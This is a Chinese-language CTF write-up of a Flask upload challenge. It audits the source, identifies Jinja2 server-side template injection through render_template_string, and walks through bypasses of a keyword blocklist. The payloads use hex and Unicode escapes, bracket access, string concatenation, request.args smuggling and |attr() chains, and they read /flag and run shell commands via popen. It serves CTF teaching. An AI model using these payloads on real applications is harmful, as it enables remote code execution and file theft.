一、访问题目

二、代码审计

import os  
import re  
  
from flask import Flask, request, jsonify,render_template_string,send_from_directory, abort,redirect  
from werkzeug.utils import secure_filename  
import os  
from werkzeug.utils import secure_filename  
  
app = Flask(__name__)  
  
# 配置信息  
UPLOAD_FOLDER = 'static/uploads'  # 上传文件保存目录  
ALLOWED_EXTENSIONS = {'txt', 'log', 'text','md','jpg','png','gif'}  
MAX_CONTENT_LENGTH = 16 * 1024 * 1024  # 限制上传大小为 16MB  
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER  
app.config['MAX_CONTENT_LENGTH'] = MAX_CONTENT_LENGTH  
  
# 创建上传目录（如果不存在）  
os.makedirs(UPLOAD_FOLDER, exist_ok=True)  
def is_safe_path(basedir, path):  
    return os.path.commonpath([basedir,path])  
  
  
def contains_dangerous_keywords(file_path):  
    dangerous_keywords = ['_', 'os', 'subclasses', '__builtins__', '__globals__','flag',]  
  
    with open(file_path, 'rb') as f:  
        file_content = str(f.read())  
  
  
        for keyword in dangerous_keywords:  
            if keyword in file_content:  
                return True  # 找到危险关键字，返回 True  
    return False  # 文件内容中没有危险关键字  
def allowed_file(filename):  
    return '.' in filename and \  
        filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS  
  
  
@app.route('/', methods=['GET', 'POST'])  
def upload_file():  
    if request.method == 'POST':  
        # 检查是否有文件被上传  
        if 'file' not in request.files:  
            return jsonify({"error": "未上传文件"}), 400  
  
        file = request.files['file']  
  
        # 检查是否选择了文件  
        if file.filename == '':  
            return jsonify({"error": "请选择文件"}), 400  
  
        # 验证文件名和扩展名  
        if file and allowed_file(file.filename):  
            # 安全处理文件名  
            filename = secure_filename(file.filename)  
            # 保存文件  
            save_path = os.path.join(app.config['UPLOAD_FOLDER'], filename)  
            file.save(save_path)  
  
  
  
            # 返回文件路径（绝对路径）  
            return jsonify({  
                "message": "File uploaded successfully",  
                "path": os.path.abspath(save_path)  
            }), 200  
        else:  
            return jsonify({"error": "文件类型错误"}), 400  
  
    # GET 请求显示上传表单（可选）  
    return '''  
    <!doctype html>    <title>Upload File</title>    <h1>Upload File</h1>    <form method=post enctype=multipart/form-data>      <input type=file name=file>      <input type=submit value=Upload>    </form>    '''  
@app.route('/file/<path:filename>')  
def view_file(filename):  
    try:  
        # 1. 过滤文件名  
        safe_filename = secure_filename(filename)  
        if not safe_filename:  
            abort(400, description="无效文件名")  
  
        # 2. 构造完整路径  
        file_path = os.path.join(app.config['UPLOAD_FOLDER'], safe_filename)  
  
        # 3. 路径安全检查  
        if not is_safe_path(app.config['UPLOAD_FOLDER'], file_path):  
            abort(403, description="禁止访问的路径")  
  
        # 4. 检查文件是否存在  
        if not os.path.isfile(file_path):  
            abort(404, description="文件不存在")  
  
        suffix=os.path.splitext(filename)[1]  
        print(suffix)  
        if suffix==".jpg" or suffix==".png" or suffix==".gif":  
            return send_from_directory("static/uploads/",filename,mimetype='image/jpeg')  
  
        if contains_dangerous_keywords(file_path):  
            # 删除不安全的文件  
            os.remove(file_path)  
            return jsonify({"error": "Waf!!!!"}), 400  
  
        with open(file_path, 'rb') as f:  
            file_data = f.read().decode('utf-8')  
        tmp_str = """<!DOCTYPE html>  
        <html lang="zh">        <head>            <meta charset="UTF-8">            <meta name="viewport" content="width=device-width, initial-scale=1.0">            <title>查看文件内容</title>  
        </head>        <body>            <h1>文件内容：{name}</h1>  <!-- 显示文件名 -->            <pre>{data}</pre>  <!-- 显示文件内容 -->  
            <footer>                <p>&copy; 2025 文件查看器</p>  
            </footer>        </body>        </html>        """.format(name=safe_filename, data=file_data)  
  
        return render_template_string(tmp_str)  
  
    except Exception as e:  
        app.logger.error(f"文件查看失败: {str(e)}")  
        abort(500, description="文件查看失败:{} ".format(str(e)))  
  
  
# 错误处理（可选）  
@app.errorhandler(404)  
def not_found(error):  
    return {"error": error.description}, 404  
  
  
@app.errorhandler(403)  
def forbidden(error):  
    return {"error": error.description}, 403  
  
  
if __name__ == '__main__':  
    app.run("0.0.0.0",debug=False)

• 分析代码，发现有ssti注入的可能

tmp_str = """<!DOCTYPE html>  
        <html lang="zh">        <head>            <meta charset="UTF-8">            <meta name="viewport" content="width=device-width, initial-scale=1.0">            <title>查看文件内容</title>  
        </head>        <body>            <h1>文件内容：{name}</h1>  <!-- 显示文件名 -->            <pre>{data}</pre>  <!-- 显示文件内容 -->  
            <footer>                <p>&copy; 2025 文件查看器</p>  
            </footer>        </body>        </html>        """.format(name=safe_filename, data=file_data)  
  
        return render_template_string(tmp_str)

render_template 是 Flask 框架中的一个函数，用于渲染 HTML 模板。它接受模板文件名作为第一个参数，并可以传递一组变量作为第二个参数。render_template_string()的作用和前者类似，但它直接接受字符串而不是模板文件，并使用 Jinja2 渲染。在html模板中name和data会被当做模板进行渲染，这样就可以通过注入恶意代码使得恶意代码被渲染从而造成ssti。

• 获取文件上传后的路径

@app.route('/file/<path:filename>')

 with open(file_path, 'rb') as f:
            file_data = f.read().decode('utf-8')

上传成功后访问/file/文件名，并且以二进制文件的格式打开文件并使用utf-8的解码形式进行读取，如果目标是图像或者其它不能使用utf-8解码形式的文件，解析会报错,因此需要上传文本类型的文件。

• waf

def contains_dangerous_keywords(file_path):  
dangerous_keywords = ['_', 'os', 'subclasses', '__builtins__', '__globals__','flag',]  
  
if contains_dangerous_keywords(file_path):  
    # 删除不安全的文件  
    os.remove(file_path)  
    return jsonify({"error": "Waf!!!!"}), 400

代码规定了黑名单，文件的内容中如果包含黑名单中的字符就会删除该文件并报错

三、waf绕过

1.传入{{7*7}}

成功解析为49，存在漏洞

2.waf绕过

方法一

• 使用十六进制绕过敏感字符（如flag中的字母g、下划线）

• 方括号 []替换.：Python允许通过obj["key"]的方式访问属性或字典的键，这种方式的属性名被包裹在字符串中，可以动态构造（比如拼接或编码），从而绕过WAF对固定模式的过滤

• 使用Unicode 编码绕过敏感字符

• 过滤关键字使用+拼接绕过

• lipsum构造payload
  输入{{lipsum}}成功解析，说明该函数存在
  

  
  
  

十六进制\x5f替换_,中括号替换.，使用__globals__函数查看全局变量

{{lipsum["\x5f\x5fglobals\x5f\x5f"]}}

输入，成功解析，获取全局变量

调用__builtins__ 模块从全局变量中拿到 Python 内置函数字典,调用 open 函数读取 /flag文件内容，十六进制\x67替换g

{{lipsum["\x5f\x5fglobals\x5f\x5f"]["\x5f\x5fbuiltins\x5f\x5f"]["open"]("/fla\x67").read()}}

源payload

{{lipsum.__globals__.__builtins__.open('/flag').read()}}

• ''构造payload
  查看当前对象所属类

{{''["\x5f\x5fclass\x5f\x5f"]}}

构造payload：Unicode 编码，过滤关键字使用+拼接绕过

{{''["\x5f\x5fclass\x5f\x5f"]["\x5f\x5fbase\x5f\x5f"]["\x5f\x5fsub"+"classes\x5f\x5f"]()[137]["\x5f\x5finit\x5f\x5f"]["\x5f\x5fglobals\x5f\x5f"]["\x5f\x5fbuiltins\x5f\x5f"]['open']('/\u0066\u006c\u0061\u0067').read()}}

源payload

{{''.__class__.__base__.__subclasses__()[137].__init__.__globals__.__builtins__.open('/flag').read()}}

方法二

request绕过：预设查询参数+从url中传递值拼接的方法来绕过直接对模板参数的过滤

request绕过详解：
request.args.xx 是 Python 的 Flask 框架中用于访问 URL 查询参数的一种方式。具体来说：
request 是 Flask 中的一个全局对象，代表当前的 HTTP 请求。
request.args 是一个字典-like 的对象（实际上是 MultiDict），它包含了 URL 中查询字符串（即 ? 后面的部分）中的所有参数。
xx 是查询参数的名称，通过 request.args.xx 可以获取对应参数的值。
例如，如果 URL 是 http://example.com/path?param1=value1$param1=value2，那么：
request.args['param1'] 返回 ‘value1’。
request.args['param2'] 返回 ‘value2’。
在 Jinja2 模板中，可以直接写 request.args.param1 来获取 ‘value1’。
简单来说，request.args.xx 就是从 URL 查询参数中提取名为 xx 的值的一种方法

构造payload：

{{''[request.args.x1][request.args.x2][0][request.args.x3]()[137][request.args.x4][request.args.x5]['popen']('cat /f*').read()}}

url：

?x1=__class__&x2=__bases__&x3=__subclasses__&x4=__init__&&x5=__globals__

将?及后面字符拼接到所上传文件的url后即可：

方法三

Unicode 编码+attr()绕过
.等价于|attr()，即''|attr("__class__")等效于''.__class__

{{lipsum.__globals__.get('os').popen('cat /f*').read()}}

{{lipsum|attr("\u005f\u005f\u0067\u006c\u006f\u0062\u0061\u006c\u0073\u005f\u005f")|attr("\u0067\u0065\u0074")("\u006f\u0073")|attr("\u0070\u006f\u0070\u0065\u006e")("cat /f*")|attr("\u0072\u0065\u0061\u0064")()}}

总结

• 十六进制、Unicode 编码绕过关键字过滤
• 方括号 []替换.
• 过滤关键字使用+拼接绕过
• request绕过：预设查询参数+从url中传递值拼接的方法来绕过直接对模板参数的过滤
• attr()绕过：|attr()替换.